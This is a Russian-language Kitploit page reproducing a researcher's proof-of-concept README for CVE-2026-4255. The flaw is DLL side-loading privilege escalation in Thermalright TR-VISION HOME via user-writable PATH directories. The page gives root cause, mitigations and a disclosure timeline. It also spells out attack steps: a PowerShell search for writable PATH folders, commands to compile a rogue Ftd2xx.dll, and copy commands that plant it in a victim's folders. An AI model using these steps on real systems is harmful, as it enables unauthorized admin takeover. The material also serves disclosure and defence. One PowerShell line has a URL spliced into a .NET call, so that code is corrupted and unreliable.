Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-4255 — Доказательство концепции для CVE-2026-4255: повышение привилегий через DLL-загрузку (side-loading) в Thermalright TR-VISION HOME с помощью внедрения каталога PATH, включая полный анализ первопричины и рекомендации по смягчению последствий. | Kitploit
Инструменты/GitHubGitHub/ard33/cve-2026-4255
Повышение привилегийАнализ уязвимостейЭксплуатацияСтатьи и ИсследованияОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHubard33/cve-2026-4255

CVE-2026-4255

Доказательство концепции для CVE-2026-4255: повышение привилегий через DLL-загрузку (side-loading) в Thermalright TR-VISION HOME с помощью внедрения каталога PATH, включая полный анализ первопричины и рекомендации по смягчению последствий.

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-4255 Thermalright TR-VISION HOME: Повышение привилегий через боковую загрузку DLL

Серьезность: ВЫСОКИЙ (CVSS 8.4)
CWE: CWE-829 Включение функциональности из недоверенной сферы управления
Опубликовано: 16/03/2026
CNA: Toreon
Затронутые версии: Thermalright TR-VISION HOME ≤ 2.0.5 (Windows 64-bit)
Обнаружено: Ard33


Описание

Thermalright TR-VISION HOME загружает Ftd2xx.dll (библиотека FTDI для USB-to-serial) с использованием стандартного порядка поиска DLL в Windows. Этот порядок включает каталоги, доступные для записи пользователем, перед защищёнными системными расположениями. Поскольку TR-VISION HOME всегда выполняется с административными привилегиями и не проверяет целостность или подпись загружаемых библиотек, злоумышленник, имеющий возможность записывать в любой каталог в PATH, может разместить вредоносную Ftd2xx.dll и добиться её загрузки с повышенными привилегиями при следующем запуске приложения.

Для размещения DLL не требуются права администратора. Пользователь с низкими привилегиями может использовать эту уязвимость против любого пользователя, который впоследствии запустит TR-VISION HOME с повышением прав.

Вектор CVSS 4.0

root@kitploit:~
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
МетрикаЗначение
Вектор атакиЛокальный
Сложность атакиНизкая
Требования к атакеНет

Корневая причина

Приложение вызывает LoadLibrary("Ftd2xx.dll") (или неявно импортирует её во время загрузки) без указания полного пути. Windows разрешает библиотеку, проходя по порядку поиска, определенному в MSDN: Порядок поиска динамически загружаемых библиотек:

  1. Каталог, из которого было загружено приложение
  2. Системный каталог (C:\Windows\System32)
  3. 16-битный системный каталог
  4. Каталог Windows
  5. Текущий рабочий каталог
  6. Каталоги, перечисленные в переменной окружения PATH ← эксплуатируемо

Злоумышленник размещает Ftd2xx.dll в каталоге, доступном для записи пользователю, который располагается в PATH до System32. C:\Users\<User>\.local\bin — один из таких каталогов, присутствующий в PATH по умолчанию, что делает его надёжным местом для размещения.


Затронутое ПО

ПОВерсияПлатформа
Thermalright TR-VISION HOME≤ 2.0.5Windows x64

Протестировано на TR-VISION HOME 2.0.5 на Windows 11.


Подтверждение концепции

Предварительные условия

  • Любая стандартная учётная запись Windows (права администратора не требуются для размещения DLL)
  • Каталог, доступный для записи пользователю, присутствующий в %PATH%
  • Целевой пользователь должен запустить TR-VISION HOME (он запрашивает повышение прав через UAC при запуске)

Шаги

1. Определение доступного для записи каталога в PATH

root@kitploit:~
$env:PATH -split ';' | Where-Object {
    if (-not $_ -or -not (Test-Path $_)) { return $false }
    try {
        $t = Join-Path $_ '.wrtest'
        [System.IO.File]:https://raw.githubusercontent.com/ard33/cve-2026-4255/HEAD/:Create($t).Close()
        Remove-Item $t -Force
        $true
    } catch { $false }
}

Надёжный вариант по умолчанию: C:\Users\<User>\.local\bin

2. Компиляция PoC DLL

MinGW (кроссплатформенный или нативный):

root@kitploit:~
gcc -shared -o Ftd2xx.dll poc/Ftd2xx.c -Wl,--out-implib,Ftd2xx.lib

MSVC:

root@kitploit:~
cl /LD poc\Ftd2xx.c /Fe:Ftd2xx.dll

3. Размещение DLL

Выберите любой доступный для записи каталог из шага 1. Два распространённых варианта по умолчанию:

root@kitploit:~
:: каталог скриптов uv / pipx по умолчанию
copy Ftd2xx.dll "C:\Users\<victim>\.local\bin\Ftd2xx.dll"

:: Python Launcher (стандартная установка Python)
copy Ftd2xx.dll "C:\Users\<victim>\AppData\Local\Programs\Python\Launcher\Ftd2xx.dll"

Для этого шага не требуется повышение прав.

4. Запуск

Жертва запускает TR-VISION HOME (например, из меню «Пуск» или системного трея). Запрос UAC запускает приложение с административными привилегиями. Во время инициализации Ftd2xx.dll разрешается через порядок поиска, размещённая копия находится до System32, и DllMain злоумышленника выполняется в контексте повышенного процесса.

5. Ожидаемый результат

  • Появляется всплывающее окно, подтверждающее, что DLL была загружена в повышенный процесс
  • Создаётся файл C:\Users\Public\CVE-2026-4255_pwned.txt, содержащий:
    • Идентификатор процесса TR-VISION HOME
    • Подтверждение того, что TokenIsElevated = YES

Подтверждение скриншотами

Procmon показывает, как TR-VISION HOME (PID 78940) ищет Ftd2xx.dll в каталогах PATH — все возвращают NAME NOT FOUND, пока не будет найдена размещённая копия:

Procmon trace

Ftd2xx.dll размещён в AppData\Local\Programs\Python\Launcher\ (дата 26/12/2025 — день обнаружения):

Planted DLL in Python Launcher

Оболочка cmd с повышенными правами, порождённая загруженной DLL — строка заголовка подтверждает контекст администратора:

Elevated shell proof

TR-VISION HOME версия 2.0.5:

Version


Смягчение последствий

Для Thermalright:

  1. Загружать Ftd2xx.dll с использованием полного пути во время выполнения:
    root@kitploit:~
    LoadLibraryExA("C:\\Windows\\System32\\Ftd2xx.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
    
  2. Использовать флаги LOAD_LIBRARY_SEARCH_SYSTEM32 или LOAD_LIBRARY_SEARCH_APPLICATION_DIR с LoadLibraryEx.
  3. Проверять цифровую подпись загружаемых библиотек с помощью WinVerifyTrust.
  4. Включить безопасный режим поиска DLL (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode = 1), хотя это не полностью устраняет подмену на основе PATH.

Для пользователей (временные меры):

  • Поместить легитимную Ftd2xx.dll (из пакета драйверов FTDI D2XX) непосредственно в каталог установки TR-VISION HOME (например, C:\Program Files\TR-VISION HOME\). Каталог приложения является первым местом поиска, поэтому легитимная копия там будет приоритетнее любой подмены на основе PATH.
  • Не запускать TR-VISION HOME до появления исправленной версии.

Хронология

ДатаСобытие
26/12/2025Уязвимость обнаружена
27/12/2025Связались с вендором (Thermalright) через каналы поддержки
16/03/2026Публичное раскрытие — CVE-2026-4255 присвоен Toreon CNA

Ссылки

  • NVD — CVE-2026-4255
  • CWE-829 — Включение функциональности из недоверенной сферы управления
  • MSDN — Порядок поиска DLL
  • Драйвер FTDI Ftd2xx
  • Thermalright TR-VISION HOME

Отказ от ответственности

Данное подтверждение концепции предоставлено только в образовательных и исследовательских целях. Полезная нагрузка PoC намеренно безвредна — она записывает текстовый файл и показывает окно сообщения. Используйте только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение. Автор не несёт ответственности за неправомерное использование.

Скачать инструмент
Необходимые привилегии
Нет
Взаимодействие пользователяАктивное (жертва запускает приложение)